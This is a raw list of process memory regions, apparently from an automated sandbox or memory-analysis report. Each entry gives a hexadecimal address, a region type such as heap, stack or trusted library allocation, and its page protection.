1E28038B000
heap
page read and write
17083024000
heap
page read and write
6DB407E000
unkown
page readonly
24D32D10000
heap
page read and write
24D34FA0000
heap
page read and write
1A6B4A8E000
heap
page read and write
1C7BFFCD000
trusted library allocation
page read and write
24D34210000
heap
page read and write
1C7D745D000
heap
page read and write
713F000
heap
page read and write
1708777C000
heap
page read and write
150FCA94000
heap
page read and write
150FB251000
heap
page read and write
16006331000
heap
page read and write
1708303F000
heap
page read and write
17085031000
heap
page read and write
17085199000
heap
page read and write
160062FE000
heap
page read and write
17085074000
heap
page read and write
24D341D0000
heap
page read and write
1E2803B5000
heap
page read and write
24D33810000
heap
page read and write
22F5EC02000
heap
page read and write
1708508A000
heap
page read and write
1C7C0339000
trusted library allocation
page read and write
1DEFEA9D000
heap
page read and write
46E8AFE000
unkown
page readonly
BBF000
heap
page read and write
1E28050D000
heap
page read and write
2DDFFA02000
heap
page read and write
24D3BA42000
heap
page read and write
2DDFFA22000
heap
page read and write
150FCA59000
heap
page read and write
24D2E498000
heap
page read and write
24D36932000
heap
page read and write
7FF9C5700000
trusted library allocation
page read and write
7050000
heap
page read and write
24D34851000
heap
page read and write
17085080000
heap
page read and write
1E2803B0000
heap
page read and write
82958FD000
stack
page read and write
46E95FE000
unkown
page readonly
1708512F000
heap
page read and write
1C7D8378000
heap
page read and write
1708300E000
heap
page read and write
1C7D75DE000
heap
page read and write
224C2411000
unkown
page read and write
24D34711000
heap
page read and write
57EB2FF000
stack
page read and write
1708776B000
heap
page read and write
1C7D7360000
heap
page read and write
7FF9C5982000
trusted library allocation
page read and write
1708507A000
heap
page read and write
1A6B4A62000
heap
page read and write
26B9E0D0000
heap
page read and write
7FF9C5930000
trusted library allocation
page read and write
24D33FD0000
heap
page read and write
170877A7000
heap
page read and write
7FFA33162000
unkown
page write copy
24D3B8C1000
heap
page read and write
135D000
stack
page read and write
1187000
heap
page read and write
24D2E504000
heap
page read and write
7188000
heap
page read and write
660F0000
unkown
page readonly
7FF9C5266000
trusted library allocation
page read and write
24D3B7C1000
heap
page read and write
1E2803BB000
heap
page read and write
7FF9C5600000
trusted library allocation
page read and write
24D35D62000
heap
page read and write
224C2500000
trusted library allocation
page read and write
16006378000
heap
page read and write
1A6B48E0000
heap
page read and write
11C8000
heap
page read and write
24206FE000
stack
page read and write
24D362F0000
heap
page read and write
170877C0000
heap
page read and write
1DEFEA37000
heap
page read and write
24D34010000
heap
page read and write
1E2801D0000
heap
page read and write
46E96FC000
stack
page read and write
1E280522000
heap
page read and write
20875280000
heap
page read and write
20874EF3000
heap
page read and write
24D352E0000
heap
page read and write
2A7E000
stack
page read and write
1708303D000
heap
page read and write
24D2E49C000
heap
page read and write
1169000
heap
page read and write
1110000
heap
page read and write
1F54E87F000
heap
page read and write
24D36972000
heap
page read and write
5BF3FB000
stack
page read and write
7FF9C5A50000
trusted library allocation
page read and write
1C7BFFD5000
trusted library allocation
page read and write
24D35060000
heap
page read and write
24D33611000
heap
page read and write
224C26D0000
trusted library allocation
page read and write
1A8B8A4A000
heap
page read and write
1E2803A0000
heap
page read and write
1C7CF3D3000
trusted library allocation
page read and write
150FB1A0000
heap
page read and write
26B9E0B0000
heap
page read and write
24D366F1000
heap
page read and write
24D2E410000
heap
page read and write
1DEFEA6E000
heap
page read and write
1FED5980000
heap
page read and write
17085049000
heap
page read and write
24D35FB0000
heap
page read and write
1708506E000
heap
page read and write
46E91FB000
stack
page read and write
A245BCF000
stack
page read and write
1C7BD610000
heap
page read and write
224C2466000
heap
page read and write
24D2E496000
heap
page read and write
17087CA0000
heap
page read and write
24D2E495000
heap
page read and write
7FF9C5B60000
trusted library allocation
page read and write
24D3B801000
heap
page read and write
24D3B2C0000
heap
page read and write
170877BB000
heap
page read and write
17085070000
heap
page read and write
24D2E4A8000
heap
page read and write
5BF17E000
stack
page read and write
9E3037D000
stack
page read and write
2672F7BA000
heap
page read and write
1E2803B0000
heap
page read and write
170851C8000
heap
page read and write
1E28051F000
heap
page read and write
6494E000
unkown
page readonly
24D360B0000
heap
page read and write
24D33D51000
heap
page read and write
1A8B8CF0000
heap
page read and write
1F54E913000
heap
page read and write
1E280509000
heap
page read and write
24D33F10000
heap
page read and write
24D35220000
heap
page read and write
E81677E000
unkown
page readonly
9E2F97E000
unkown
page readonly
24D34411000
heap
page read and write
1DEFEA27000
heap
page read and write
1C7BD460000
heap
page read and write
E816F7E000
unkown
page readonly
E81667B000
stack
page read and write
DDE5AFD000
stack
page read and write
6C45000
heap
page read and write
7FF9C5390000
trusted library allocation
page read and write
24D32D11000
heap
page read and write
15080000000
trusted library allocation
page read and write
7E15000
heap
page read and write
DDE5DFB000
stack
page read and write
46E8DFC000
stack
page read and write
9E2F67D000
stack
page read and write
1C7C0D11000
trusted library allocation
page read and write
17085042000
heap
page read and write
7FF9C5280000
trusted library allocation
page read and write
24D358E1000
heap
page read and write
17085061000
heap
page read and write
24D349D2000
heap
page read and write
16006326000
heap
page read and write
1C7D80B0000
heap
page read and write
17082FE6000
heap
page read and write
1C7CF5CB000
trusted library allocation
page read and write
24D36D32000
heap
page read and write
7FF9C59D0000
trusted library allocation
page read and write
1708521C000
heap
page read and write
5BF077000
stack
page read and write
A5227FF000
stack
page read and write
24D34D92000
heap
page read and write
31BB37D000
stack
page read and write
1DEFEA3A000
heap
page read and write
24D347D1000
heap
page read and write
C658BFF000
stack
page read and write
1CB99A25000
heap
page read and write
1C7D738D000
heap
page read and write
1708505A000
heap
page read and write
7FF9C5A4C000
trusted library allocation
page read and write
150FB28A000
heap
page read and write
2AF9000
stack
page read and write
3A2F000
stack
page read and write
2672F6D0000
heap
page read and write
16006336000
heap
page read and write
24D356A1000
heap
page read and write
24D3B280000
heap
page read and write
7FFA2CEE1000
unkown
page readonly
1E28038A000
heap
page read and write
2672F780000
heap
page read and write
150FB269000
heap
page read and write
17E987F000
stack
page read and write
170851B2000
heap
page read and write
17085065000
heap
page read and write
7FF9C5B1B000
trusted library allocation
page read and write
1E375FF0000
heap
page read and write
17082FF1000
heap
page read and write
150FB266000
heap
page read and write
24D35EF0000
heap
page read and write
24D3B040000
heap
page read and write
24D368B1000
heap
page read and write
24208FE000
stack
page read and write
24D35320000
heap
page read and write
24D359E2000
heap
page read and write
17083037000
heap
page read and write
1708777F000
heap
page read and write
2D9B000
stack
page read and write
160062D0000
heap
page read and write
150FCA9B000
heap
page read and write
17087797000
heap
page read and write
24D34050000
heap
page read and write
24D33790000
heap
page read and write
EC310FB000
stack
page read and write
1E28051E000
heap
page read and write
24D31DC6000
heap
page read and write
1DEFE9C0000
heap
page read and write
7FFA244AA000
unkown
page read and write
166D5359000
heap
page read and write
17084B1D000
heap
page read and write
24D3B982000
heap
page read and write
24D357A1000
heap
page read and write
1A6B4A71000
heap
page read and write
24D2E4E4000
heap
page read and write
170851C8000
heap
page read and write
6DEF000
heap
page read and write
24D3BD50000
trusted library allocation
page read and write
24D3AE80000
heap
page read and write
7FF9C5C50000
trusted library allocation
page read and write
224C2413000
unkown
page read and write
1708506A000
heap
page read and write
24D2E479000
heap
page read and write
17085070000
heap
page read and write
94786FE000
stack
page read and write
24D2E4B1000
heap
page read and write
1F54E900000
heap
page read and write
170851C5000
heap
page read and write
24D33C11000
heap
page read and write
7FF9C5320000
trusted library allocation
page read and write
46E90FE000
unkown
page readonly
11B0000
heap
page read and write
7FF9C5B50000
trusted library allocation
page read and write
24202FE000
stack
page read and write
17082FFA000
heap
page read and write
1C7D7500000
trusted library allocation
page read and write
7FF9C5730000
trusted library allocation
page read and write
1E2803A2000
heap
page read and write
24D348FD000
heap
page read and write
31BB2F6000
stack
page read and write
2DDFF890000
heap
page read and write
1E280399000
heap
page read and write
11A3000
heap
page read and write
1C7C0D79000
trusted library allocation
page read and write
24D35BE2000
heap
page read and write
7FF9C5024000
trusted library allocation
page read and write
24D2E4FB000
heap
page read and write
24D3B280000
heap
page read and write
1C7D7399000
heap
page read and write
22F5EC63000
heap
page read and write
1708505F000
heap
page read and write
17085090000
heap
page read and write
1DEFE9D0000
heap
page read and write
1A6B4B02000
heap
page read and write
1E280426000
heap
page read and write
2DDFFA79000
heap
page read and write
1C7D7416000
heap
page read and write
17085036000
heap
page read and write
24D35B22000
heap
page read and write
24D36D80000
trusted library allocation
page read and write
1E280412000
heap
page read and write
7FF9C56C0000
trusted library allocation
page read and write
17089624000
trusted library allocation
page read and write
1708300F000
heap
page read and write
1E280554000
heap
page read and write
17083007000
heap
page read and write
7FF9C5440000
trusted library allocation
page execute and read and write
24D2E435000
heap
page read and write
17085143000
heap
page read and write
24D36AF2000
heap
page read and write
1C7C0D91000
trusted library allocation
page read and write
7FF9C5650000
trusted library allocation
page read and write
1E375F80000
heap
page read and write
24D2E4FA000
heap
page read and write
7DF4E6510000
trusted library allocation
page execute and read and write
24D2E4F9000
heap
page read and write
1C7D767B000
heap
page read and write
170851B3000
heap
page read and write
150FB170000
heap
page read and write
160062B5000
heap
page read and write
7FF783509000
unkown
page readonly
17087C30000
trusted library allocation
page read and write
5BF37C000
stack
page read and write
1708503E000
heap
page read and write
1CB997FE000
heap
page read and write
7FF9C5950000
trusted library allocation
page execute and read and write
7FF9C5C90000
trusted library allocation
page read and write
24D3B8C1000
heap
page read and write
17083009000
heap
page read and write
1708506A000
heap
page read and write
22F5EB10000
heap
page read and write
1E280426000
heap
page read and write
17085040000
heap
page read and write
1C7C034E000
trusted library allocation
page read and write
24D35962000
heap
page read and write
BBC000
heap
page read and write
150FB26C000
heap
page read and write
1708507A000
heap
page read and write
224C243C000
heap
page read and write
150FBB1A000
heap
page read and write
1E280350000
heap
page read and write
24D3B1C0000
heap
page read and write
22F5EC37000
heap
page read and write
7FF9C5270000
trusted library allocation
page read and write
1E280404000
heap
page read and write
17082F71000
heap
page read and write
150FCA64000
heap
page read and write
24D34C92000
heap
page read and write
24D3B4C1000
heap
page read and write
31BC24D000
stack
page read and write
274DA340000
heap
page read and write
24D2E4F3000
heap
page read and write
150FCA7F000
heap
page read and write
24D3BB02000
heap
page read and write
17085030000
heap
page read and write
7FFA51137000
unkown
page readonly
2D70000
heap
page read and write
1DEFEA67000
heap
page read and write
150FBA15000
heap
page read and write
11B8000
heap
page read and write
7FF9C50D0000
trusted library allocation
page read and write
7FFA51120000
unkown
page readonly
1C7D779E000
heap
page read and write
24D3B902000
heap
page read and write
24D31BC9000
heap
page read and write
24D34551000
heap
page read and write
AE9000
heap
page read and write
24D33010000
heap
page read and write
1CEC18B0000
heap
page read and write
17083020000
heap
page read and write
24D35AE2000
heap
page read and write
947877F000
stack
page read and write
24D35020000
heap
page read and write
24D3AFC0000
heap
page read and write
1E2803E8000
heap
page read and write
24D363F1000
heap
page read and write
1708508C000
heap
page read and write
2DDFF9C0000
trusted library allocation
page read and write
1C7BD408000
heap
page read and write
24D33090000
heap
page read and write
24D357E1000
heap
page read and write
17085090000
heap
page read and write
24D3B641000
heap
page read and write
150FC8A0000
trusted library allocation
page read and write
11237FD000
stack
page read and write
7FF9C5630000
trusted library allocation
page read and write
11B4000
heap
page read and write
24D34390000
heap
page read and write
17085073000
heap
page read and write
2AF18B20000
heap
page read and write
1E2803A4000
heap
page read and write
E81637E000
unkown
page readonly
1A8B89B0000
heap
page read and write
22F5EC00000
heap
page read and write
24D3B9C2000
heap
page read and write
98F237E000
unkown
page readonly
17082F68000
heap
page read and write
1C7CF369000
trusted library allocation
page read and write
E88ECFF000
stack
page read and write
24D34511000
heap
page read and write
17085126000
heap
page read and write
1E2803DF000
heap
page read and write
7FF9C523B000
trusted library allocation
page read and write
1DEFEAA8000
heap
page read and write
24D363B1000
heap
page read and write
7FFA244AE000
unkown
page readonly
170851E0000
heap
page read and write
24D3AD81000
heap
page read and write
1C7BD540000
trusted library allocation
page read and write
1E280404000
heap
page read and write
7EAC000
stack
page read and write
224C23D0000
heap
page read and write
1C7C06E4000
trusted library allocation
page read and write
24D2E4F7000
heap
page read and write
150FC830000
trusted library allocation
page read and write
1708503C000
heap
page read and write
7FF9C55F0000
trusted library allocation
page read and write
1E2803BD000
heap
page read and write
EC311FF000
unkown
page read and write
7FF9C55C0000
trusted library allocation
page read and write
1E2805D3000
heap
page read and write
1E2803E7000
heap
page read and write
20874ED8000
heap
page read and write
7FFA33162000
unkown
page read and write
24D35461000
heap
page read and write
17085072000
heap
page read and write
1708521B000
heap
page read and write
6DB3E7E000
unkown
page readonly
7FFA4194C000
unkown
page read and write
24D2E506000
heap
page read and write
31BAD31000
stack
page read and write
24D33F50000
heap
page read and write
1E28039E000
heap
page read and write
16006306000
heap
page read and write
24D34B52000
heap
page read and write
BE0000
heap
page read and write
1600632E000
heap
page read and write
1708507C000
heap
page read and write
24D33E10000
heap
page read and write
24D3B7C1000
heap
page read and write
24D34110000
heap
page read and write
1600632C000
heap
page read and write
7FF9C58B0000
trusted library allocation
page execute and read and write
24D34791000
heap
page read and write
1600631D000
heap
page read and write
20874EDD000
heap
page read and write
7FFA33164000
unkown
page read and write
BD3000
heap
page read and write
38019FF000
stack
page read and write
1450000
heap
page read and write
24D36AB2000
heap
page read and write
2DDFF8B0000
heap
page read and write
24D3BA82000
heap
page read and write
24D35821000
heap
page read and write
1F54E878000
heap
page read and write
17085055000
heap
page read and write
17087793000
heap
page read and write
31BC2CB000
stack
page read and write
6DB34EB000
stack
page read and write
24D34591000
heap
page read and write
1C7D7722000
heap
page read and write
1C7D834F000
heap
page read and write
1E280511000
heap
page read and write
1C7D73C3000
heap
page read and write
1DEFEA95000
heap
page read and write
24D34691000
heap
page read and write
22F5EC13000
heap
page read and write
24D32F10000
heap
page read and write
7054000
heap
page read and write
9E2FAFD000
stack
page read and write
24D354E1000
heap
page read and write
24D34D12000
heap
page read and write
160062BE000
heap
page read and write
166D5350000
heap
page read and write
24D364B1000
heap
page read and write
1C7C0FC4000
trusted library allocation
page read and write
1708506A000
heap
page read and write
1C7BF8A7000
trusted library allocation
page read and write
24D36871000
heap
page read and write
24D36BF2000
heap
page read and write
160062FC000
heap
page read and write
7FF7834CD000
unkown
page readonly
1C7BD550000
heap
page readonly
1C7CF651000
trusted library allocation
page read and write
1C7BFE28000
trusted library allocation
page read and write
24D36831000
heap
page read and write
24D2E4D3000
heap
page read and write
7FF9C53B0000
trusted library allocation
page execute and read and write
24D34811000
heap
page read and write
1708506E000
heap
page read and write
53006FF000
stack
page read and write
112377E000
stack
page read and write
24D35421000
heap
page read and write
7FF9C5489000
trusted library allocation
page read and write
17082FB9000
heap
page read and write
17085033000
heap
page read and write
1C7CF361000
trusted library allocation
page read and write
24D36B72000
heap
page read and write
7FFA2CEF1000
unkown
page execute read
24D342D0000
heap
page read and write
17085055000
heap
page read and write
24D34411000
heap
page read and write
46EA1FE000
unkown
page readonly
46E9F7E000
unkown
page readonly
17085070000
heap
page read and write
1DEFEA57000
heap
page read and write
1E280424000
heap
page read and write
17085082000
heap
page read and write
6D43000
heap
page read and write
53003FE000
stack
page read and write
1CB997C0000
heap
page read and write
31BADFF000
stack
page read and write
24D361B0000
heap
page read and write
7FF9C59F0000
trusted library allocation
page read and write
170851CA000
heap
page read and write
17085087000
heap
page read and write
170851E0000
heap
page read and write
7598000
stack
page read and write
24D2E4C7000
heap
page read and write
7FF9C5C80000
trusted library allocation
page read and write
1E28051E000
heap
page read and write
11A7000
heap
page read and write
24D344D1000
heap
page read and write
46E9FFE000
unkown
page readonly
9E2EDFB000
stack
page read and write
1E280525000
heap
page read and write
150FC040000
trusted library allocation
page read and write
2AF18BA9000
heap
page read and write
7FF9C5460000
trusted library allocation
page read and write
24D368F1000
heap
page read and write
150FB2B7000
heap
page read and write
98F217E000
unkown
page readonly
1F54E813000
heap
page read and write
24D358E1000
heap
page read and write
24D34B12000
heap
page read and write
1E280500000
heap
page read and write
24D354E1000
heap
page read and write
1F54F015000
heap
page read and write
274DA2B0000
heap
page read and write
1C363275000
heap
page read and write
1E2803EC000
heap
page read and write
24D3B481000
heap
page read and write
66000000
unkown
page readonly
17082FD7000
heap
page read and write
24D3B701000
heap
page read and write
7168000
heap
page read and write
1C7D7688000
heap
page read and write
170851A5000
heap
page read and write
24D35661000
heap
page read and write
24D345D1000
heap
page read and write
7FF9C54F0000
trusted library allocation
page execute and read and write
2672F5D0000
heap
page read and write
24D36731000
heap
page read and write
1DEFF202000
trusted library allocation
page read and write
24D31C8D000
heap
page read and write
224C2515000
trusted library allocation
page read and write
150FC751000
trusted library allocation
page read and write
24D33D11000
heap
page read and write
1E2803DB000
heap
page read and write
1E2803E7000
heap
page read and write
150FC8B0000
trusted library allocation
page read and write
17087792000
heap
page read and write
24D33B90000
heap
page read and write
2672F7B8000
heap
page read and write
17085090000
heap
page read and write
24D35FF0000
heap
page read and write
5BF2FE000
stack
page read and write
1FED5910000
heap
page read and write
1708302E000
heap
page read and write
1E2803C2000
heap
page read and write
17082FFA000
heap
page read and write
17085090000
heap
page read and write
7918000
stack
page read and write
24D3B7A0000
heap
page read and write
170851E4000
heap
page read and write
1E376000000
heap
page read and write
24D2E49E000
heap
page read and write
1E2803A8000
heap
page read and write
1A6B4B13000
heap
page read and write
150FC140000
trusted library section
page readonly
24D3AF80000
heap
page read and write
24D34A92000
heap
page read and write
17085072000
heap
page read and write
46E9B7E000
unkown
page readonly
170851E0000
heap
page read and write
150FCA00000
heap
page read and write
224C242B000
heap
page read and write
188AEE80000
heap
page read and write
1FED5B60000
heap
page read and write
682A4000
unkown
page write copy
1A8B89C0000
heap
page read and write
24D2E475000
heap
page read and write
64FE8FF000
stack
page read and write
24D35DB1000
heap
page read and write
98F297E000
unkown
page readonly
24D35FF0000
heap
page read and write
17085020000
heap
page read and write
1DEFEA53000
heap
page read and write
17085172000
heap
page read and write
17082FCF000
heap
page read and write
1708505F000
heap
page read and write
17085061000
heap
page read and write
24D35260000
heap
page read and write
24D36B32000
heap
page read and write
6CE7000
heap
page read and write
1AC47E000
stack
page read and write
E88E76C000
stack
page read and write
170851AB000
heap
page read and write
7FF9C5260000
trusted library allocation
page read and write
24D36771000
heap
page read and write
24D2E46F000
heap
page read and write
24D33A10000
heap
page read and write
24D36AB2000
heap
page read and write
24D366B1000
heap
page read and write
274DA2D0000
heap
page read and write
170877A9000
heap
page read and write
170877C5000
heap
page read and write
3B69DC000
stack
page read and write
6420000
heap
page read and write
17085047000
heap
page read and write
7FFA330E1000
unkown
page execute read
11AA000
heap
page read and write
5150000
heap
page read and write
46E8BFE000
stack
page read and write
24D36671000
heap
page read and write
24D2E4E1000
heap
page read and write
24D3B100000
heap
page read and write
24201FE000
stack
page read and write
1E28037E000
heap
page read and write
24D33610000
heap
page read and write
24D3ADC0000
heap
page read and write
1C3630A0000
heap
page read and write
16006327000
heap
page read and write
24D36571000
heap
page read and write
24D3B9C2000
heap
page read and write
1708301C000
heap
page read and write
1708506E000
heap
page read and write
7FFA51121000
unkown
page execute read
9E3047E000
unkown
page readonly
188AEFA0000
heap
page read and write
2558DFE000
stack
page read and write
1708505A000
heap
page read and write
24D3B581000
heap
page read and write
1DEFEA4B000
heap
page read and write
1C7D77C0000
heap
page read and write
7FF78DE30000
unkown
page readonly
24D3BA82000
heap
page read and write
7FF9C599A000
trusted library allocation
page read and write
2DDFFB00000
heap
page read and write
24D35D62000
heap
page read and write
24D35D62000
heap
page read and write
1708506A000
heap
page read and write
1FED598B000
heap
page read and write
24D33DD1000
heap
page read and write
150FCB13000
heap
page read and write
1A6B4A02000
heap
page read and write
17087773000
heap
page read and write
1010000
heap
page read and write
24D35C22000
heap
page read and write
17085065000
heap
page read and write
24D3B080000
heap
page read and write
57EB0FF000
unkown
page read and write
1E280377000
heap
page read and write
170851BA000
heap
page read and write
6DB35EE000
stack
page read and write
24D34AD2000
heap
page read and write
1DEFEA5D000
heap
page read and write
24D356A1000
heap
page read and write
1E2803F8000
heap
page read and write
2558AFB000
stack
page read and write
46E987E000
stack
page read and write
24D353E1000
heap
page read and write
1CEC1880000
heap
page read and write
1DEFEAA0000
heap
page read and write
46EA97E000
stack
page read and write
17085055000
heap
page read and write
1708506B000
heap
page read and write
24D34250000
heap
page read and write
1E280385000
heap
page read and write
17085070000
heap
page read and write
1F54E6B0000
heap
page read and write
170851E6000
heap
page read and write
1DEFEB02000
heap
page read and write
31BB576000
stack
page read and write
274DA2A5000
heap
page read and write
150FB2A1000
heap
page read and write
24D35CE2000
heap
page read and write
24D33750000
heap
page read and write
1E2803A8000
heap
page read and write
7FF78DE34000
unkown
page readonly
24D3B341000
heap
page read and write
7FF7834CD000
unkown
page readonly
7FFA2CE21000
unkown
page execute read
1C7D7690000
heap
page read and write
2672F6B0000
heap
page read and write
1C7D769E000
heap
page read and write
24D3B541000
heap
page read and write
16006343000
heap
page read and write
E88EAFF000
unkown
page read and write
7FF9C55B0000
trusted library allocation
page read and write
8200000
heap
page read and write
2672F7CA000
heap
page read and write
26B4000
heap
page read and write
7FF9C5023000
trusted library allocation
page execute and read and write
17085035000
heap
page read and write
7FF9C5B17000
trusted library allocation
page read and write
1E2803F8000
heap
page read and write
17085055000
heap
page read and write
98F227B000
stack
page read and write
24D3B881000
heap
page read and write
68297000
unkown
page readonly
150FC6A1000
trusted library allocation
page read and write
17085120000
heap
page read and write
24D35120000
heap
page read and write
24D33A90000
heap
page read and write
1FED5B55000
heap
page read and write
1AC67D000
stack
page read and write
24D33890000
heap
page read and write
24D348D1000
heap
page read and write
1DEFEA1E000
heap
page read and write
150FB2FE000
heap
page read and write
17083070000
heap
page read and write
17085055000
heap
page read and write
7FF9C56B0000
trusted library allocation
page read and write
1C7CF3C2000
trusted library allocation
page read and write
17085046000
heap
page read and write
17085050000
heap
page read and write
64940000
unkown
page readonly
1DEFEA6C000
heap
page read and write
24D36D32000
heap
page read and write
24D31BC3000
heap
page read and write
7FF9C5438000
trusted library allocation
page read and write
1708305E000
heap
page read and write
1708513B000
heap
page read and write
7FF9C503B000
trusted library allocation
page read and write
7FF9C5C40000
trusted library allocation
page read and write
24D368F1000
heap
page read and write
2DD80202000
trusted library allocation
page read and write
1E280378000
heap
page read and write
1E280389000
heap
page read and write
24D366B1000
heap
page read and write
166D52A0000
heap
page read and write
24D3639D000
heap
page read and write
7FF9C5A00000
trusted library allocation
page read and write
30A0000
trusted library allocation
page read and write
1C7D7693000
heap
page read and write
7FF9C5370000
trusted library allocation
page read and write
7FF9C5020000
trusted library allocation
page read and write
7FF78DE32000
unkown
page readonly
20875285000
heap
page read and write
24D33B10000
heap
page read and write
24D33810000
heap
page read and write
1E28038C000
heap
page read and write
188AF019000
heap
page read and write
26B9E10C000
heap
page read and write
24D356E1000
heap
page read and write
1E375EA6000
heap
page read and write
682A5000
unkown
page readonly
17085137000
heap
page read and write
6DD2000
heap
page read and write
13DE000
stack
page read and write
1E2803D7000
heap
page read and write
1600630F000
heap
page read and write
24D34DE1000
heap
page read and write
7FF9C5350000
trusted library allocation
page read and write
24D3AF40000
heap
page read and write
46EA2F9000
stack
page read and write
1DEFEA32000
heap
page read and write
24D2E475000
heap
page read and write
24D3B300000
heap
page read and write
170851EF000
heap
page read and write
1708507A000
heap
page read and write
17082FFF000
heap
page read and write
1708300D000
heap
page read and write
1A6B4B00000
heap
page read and write
1708504F000
heap
page read and write
24D33CD1000
heap
page read and write
24D36A32000
heap
page read and write
24D364B1000
heap
page read and write
170851E6000
heap
page read and write
31BC14E000
stack
page read and write
7DF4F0A11000
trusted library allocation
page execute read
11CC000
heap
page read and write
913BAFE000
stack
page read and write
53000F6000
stack
page read and write
1E2803CB000
heap
page read and write
24D36CB2000
heap
page read and write
24D35622000
heap
page read and write
20874ED0000
heap
page read and write
24D2E3E0000
heap
page read and write
24D2FF70000
heap
page read and write
1708506A000
heap
page read and write
7FF9C5C10000
trusted library allocation
page read and write
24D35921000
heap
page read and write
C658AFE000
stack
page read and write
1DEFEA4E000
heap
page read and write
22F5EC6F000
heap
page read and write
24D31BB0000
heap
page read and write
1C7BF167000
heap
page execute and read and write
2CFE000
stack
page read and write
7FFA2CEB0000
unkown
page readonly
17085056000
heap
page read and write
1192000
heap
page read and write
1C7C1038000
trusted library allocation
page read and write
24D3AF80000
heap
page read and write
150FCA42000
heap
page read and write
150FCA4E000
heap
page read and write
24D35D41000
heap
page read and write
1E2803BF000
heap
page read and write
24D2E482000
heap
page read and write
22F5EA30000
heap
page read and write
1708506A000
heap
page read and write
A245B49000
stack
page read and write
24D2E494000
heap
page read and write
7FFA5112F000
unkown
page readonly
1E2803AE000
heap
page read and write
24D34911000
heap
page read and write
1A6B4B28000
heap
page read and write
1E280404000
heap
page read and write
24D3B601000
heap
page read and write
7FFA24060000
unkown
page readonly
913B9FE000
unkown
page read and write
7FF9C5140000
trusted library allocation
page execute and read and write
11236F9000
stack
page read and write
7FF9C56D0000
trusted library allocation
page read and write
17085043000
heap
page read and write
1C7C0CE0000
trusted library allocation
page read and write
170851AB000
heap
page read and write
7FF9C5A23000
trusted library allocation
page read and write
24D34511000
heap
page read and write
16006338000
heap
page read and write
24D34D52000
heap
page read and write
1708301F000
heap
page read and write
24D3AE40000
heap
page read and write
24D35BE2000
heap
page read and write
1708507F000
heap
page read and write
170877A7000
heap
page read and write
1ABE8B000
stack
page read and write
7FF9C52B0000
trusted library allocation
page read and write
119A000
heap
page read and write
17083013000
heap
page read and write
1DEFEA5E000
heap
page read and write
46E947E000
stack
page read and write
150FC8F0000
remote allocation
page read and write
7FF78350A000
unkown
page readonly
150FB2BB000
heap
page read and write
1708505A000
heap
page read and write
24D34A12000
heap
page read and write
17085083000
heap
page read and write
24205FE000
stack
page read and write
17083028000
heap
page read and write
1C7D76B6000
heap
page read and write
102E000
heap
page read and write
1E28056A000
heap
page read and write
9E2FC7E000
stack
page read and write
1E2803F4000
heap
page read and write
16006323000
heap
page read and write
7FF9C5890000
trusted library allocation
page read and write
98F257E000
unkown
page readonly
1E2803C7000
heap
page read and write
7FFA33147000
unkown
page readonly
1C7D7391000
heap
page read and write
1E2803AE000
heap
page read and write
26B9E100000
heap
page read and write
1708506E000
heap
page read and write
17083026000
heap
page read and write
1C7C033D000
trusted library allocation
page read and write
24D34DE0000
heap
page read and write
1F54E7B0000
heap
page read and write
24D33D91000
heap
page read and write
24D350E0000
heap
page read and write
150FC280000
trusted library allocation
page read and write
150FCA5F000
heap
page read and write
1708779F000
heap
page read and write
17085073000
heap
page read and write
64A2000
heap
page read and write
17085073000
heap
page read and write
64FE9FF000
stack
page read and write
24D35AE2000
heap
page read and write
24D34310000
heap
page read and write
24D3B982000
heap
page read and write
224C2802000
heap
page read and write
46E98FE000
unkown
page readonly
7FF9C5720000
trusted library allocation
page read and write
7FF9C5B23000
trusted library allocation
page read and write
150FB190000
heap
page read and write
2AF18F55000
heap
page read and write
DDE5BFD000
stack
page read and write
150FC890000
trusted library allocation
page read and write
24D3AEC0000
heap
page read and write
1E28050D000
heap
page read and write
24D367B1000
heap
page read and write
1A8B89E0000
heap
page read and write
24D36B32000
heap
page read and write
24D343D1000
heap
page read and write
7FF9C5B70000
trusted library allocation
page execute and read and write
24D32FD0000
heap
page read and write
150FB296000
heap
page read and write
17083026000
heap
page read and write
9E2FA7E000
unkown
page readonly
24D2E3F0000
heap
page read and write
1A4BE8A0000
heap
page read and write
24D3BA02000
heap
page read and write
1C7D835B000
heap
page read and write
1C7C0352000
trusted library allocation
page read and write
31BC34D000
stack
page read and write
A52267C000
stack
page read and write
274DA355000
heap
page read and write
7FF9C51C0000
trusted library allocation
page read and write
9E2FB7E000
unkown
page readonly
24D2E4F2000
heap
page read and write
24D32F4F000
heap
page read and write
1C7BD380000
heap
page read and write
24D2E49A000
heap
page read and write
17087783000
heap
page read and write
1DEFF130000
trusted library allocation
page read and write
24D32F90000
heap
page read and write
24D3AE00000
heap
page read and write
2DDFFA2B000
heap
page read and write
17085038000
heap
page read and write
24D34B92000
heap
page read and write
17082FFD000
heap
page read and write
1CEC1B1B000
heap
page read and write
150FC750000
trusted library allocation
page read and write
224C240A000
unkown
page read and write
2DDFFA77000
heap
page read and write
17083005000
heap
page read and write
24D3B441000
heap
page read and write
1E2803D1000
heap
page read and write
31BC3CB000
stack
page read and write
31BB474000
stack
page read and write
46E9A7E000
stack
page read and write
24D2E4F3000
heap
page read and write
1DEFEA52000
heap
page read and write
17083006000
heap
page read and write
24D35561000
heap
page read and write
7FF9C5610000
trusted library allocation
page read and write
1E2803A2000
heap
page read and write
7FF9C5960000
trusted library allocation
page read and write
17085065000
heap
page read and write
7FF9C5AF0000
trusted library allocation
page read and write
B96000
heap
page read and write
68281000
unkown
page execute read
24D3B5C1000
heap
page read and write
1E28041A000
heap
page read and write
DDE5CFC000
stack
page read and write
22F5EC48000
heap
page read and write
1C362EDC000
heap
page read and write
7FF9C598D000
trusted library allocation
page read and write
1F54E88F000
heap
page read and write
E81697E000
unkown
page readonly
1708521D000
heap
page read and write
22F5EC2D000
heap
page read and write
24D36BB2000
heap
page read and write
1E2802F0000
heap
page read and write
E8162FE000
stack
page read and write
1C7C0C95000
trusted library allocation
page read and write
1C7BD500000
trusted library section
page read and write
2132B6A000
stack
page read and write
1708300F000
heap
page read and write
24D36270000
heap
page read and write
1C363270000
heap
page read and write
24D32F90000
heap
page read and write
1DEFEA70000
heap
page read and write
1E28041C000
heap
page read and write
17083014000
heap
page read and write
24D350E0000
heap
page read and write
24D3B180000
heap
page read and write
24D359A2000
heap
page read and write
224C2400000
unkown
page read and write
64953000
unkown
page write copy
150FCB11000
heap
page read and write
24D36CF2000
heap
page read and write
1C7D8340000
heap
page read and write
1C7C04FF000
trusted library allocation
page read and write
7FF9C5CB0000
trusted library allocation
page read and write
7FFA2CE20000
unkown
page readonly
22F5ED02000
heap
page read and write
1ADD0A75000
heap
page read and write
24D369F2000
heap
page read and write
24D3B000000
heap
